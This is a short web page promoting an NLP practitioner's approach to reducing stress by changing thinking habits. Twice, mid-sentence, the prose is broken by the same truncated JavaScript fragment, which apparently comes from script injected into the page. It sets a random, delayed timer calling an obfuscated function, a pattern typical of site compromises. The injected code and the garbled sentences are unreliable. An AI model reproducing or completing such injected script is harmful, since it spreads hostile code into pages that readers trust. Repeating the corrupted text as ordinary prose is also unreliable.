Stress is a feeling of overwhelm. Quite probably, last year you also had a similar worries, andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and yet not all of those worries came true.

Small amounts of stress is useful. Excessive stress is unhelpful. Excessive stress shows you that the way of thinking that you currently have isn’t working. It’s not that you can’t cope – its that the thinking methodology that you currently have is not working for you.

Thankfully, there are other ways of thinking which work far more effectively. We teach you more effective ways to think so that you can cope far better with the pressures life bring to you.

Our role as an NLP Master Health Practitioner is to assume that there is some reason why your body is creating this stress. Having successfully worked with many sufferers of stress, (sometimes on the phone), many seem to have a common thread. Although the reason behind the stress may be different, our approach is similar. Although it is possible that you have had these symptoms for years, it is also possible that if you change your thinking, your stress can reduce andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and ultimately become insignificant.
